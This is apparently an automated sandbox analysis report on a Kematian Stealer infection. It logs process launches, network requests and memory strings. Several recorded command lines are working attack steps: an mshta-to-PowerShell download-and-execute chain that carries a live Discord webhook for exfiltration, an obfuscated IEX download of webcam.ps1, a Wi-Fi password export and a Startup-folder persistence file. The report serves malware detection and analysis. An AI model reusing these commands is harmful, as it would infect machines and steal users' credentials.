Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear, CommandLine: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear, CommandLine|base64offset|contains: V, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7696, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear, ProcessId: 3964, ProcessName: netsh.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1920, TargetFilename: C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , CommandLine: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , ProcessId: 6660, ProcessName: powershell.exe
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7764, ProcessName: svchost.exe

      Data Obfuscation

      barindex
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 6592, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat
Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1920, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", ProcessId: 3020, ProcessName: csc.exe
      No Snort rule has matched


      AV Detection

      barindex
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49725 version: TLS 1.2
      Source: Binary string: winload_prod.pdbacroNGLLog.txt source: powershell.exe, 00000022.00000002.1801242655.000000C000006000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\acrobat_sbx source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: powershell.exe, 00000022.00000002.1801242655.000000C00007A000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: powershell.exe, 00000022.00000002.1801242655.000000C000014000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdbL source: powershell.exe, 0000001F.00000002.1681630492.000002B3D8001000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ntkrnlmp.pdb source: powershell.exe, 00000022.00000002.1801242655.000000C000006000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: `C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\manifest.jsonC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\INetCookiesC:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\INetHistoryC:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\RoamingStateC:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SystemAppDataC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\INetCacheC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\INetCookiesC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\INetHistoryC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\LocalCacheC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\LocalStateC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log_ source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdb source: powershell.exe, 0000001F.00000002.1614835648.000002B3C127F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdbhP source: powershell.exe, 0000001F.00000002.1614835648.000002B3C127F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp

      Networking

      barindex
Source: global traffic | HTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 185.199.109.133
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | ASN Name: FASTLYUS
Source: Joe Sandbox View | ASN Name: GITHUBUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: global traffic | HTTP traffic detected: GET /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.cloudflare.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.cloudflare.com
Source: global traffic | HTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: github.com
Source: global traffic | HTTP traffic detected: GET /github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T160852Z&X-Amz-Expires=300&X-Amz-Signature=bf5d6ce3b3c7757c8874a64bc623be15306ed51e51b0852229d79eee9986e509&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: objects.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: www.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: objects.githubusercontent.com
Source: svchost.exe, 0000001B.00000002.2541749717.0000023F50600000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001B.00000003.1466607958.0000023F504C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C102D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.com
Source: powershell.exe, 0000000C.00000002.1337478042.0000020A570A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: powershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json
Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 0000000C.00000002.1360562547.0000020A661C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C1317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFA90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C1068000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3BFA21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001F.00000002.1684520069.000002B3D825A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microscom/pkiops/certs/MicWinProPCA2011_2011-10-19.crt0
Source: powershell.exe, 0000000C.00000002.1366435066.0000020A6E439000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 0000000C.00000002.1337478042.0000020A56151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3BFA21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000C.00000002.1337478042.0000020A57780000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnw
Source: svchost.exe, 0000001B.00000003.1466607958.0000023F50519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000001B.00000003.1466607958.0000023F504C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C1028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C0D64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com
Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1
Source: powershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.2548122352.00000236B3B6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B41EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B2ED9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer
Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1
Source: powershell.exe, 00000022.00000002.1813354254.000001DF01C62000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1817228535.000001DF03C68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C10C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
Source: powershell.exe, 00000022.00000002.1817228535.000001DF03DB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin
Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/TheWover
Source: powershell.exe, 0000001F.00000002.1614710013.000002B3BE276000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1
Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C10C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
Source: powershell.exe, 0000000C.00000002.1337478042.0000020A569FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337478042.0000020A57780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337478042.0000020A570A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C0651000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000C.00000002.1360562547.0000020A661C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C1317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFA90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.git
Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C1052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: mshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/C$&m
Source: mshta.exe, mshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/ChildrenOfYa
Source: powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1
      Source: powershell.exe, 0000001F.00000002.1614835648.000002B3C1052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/trace
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
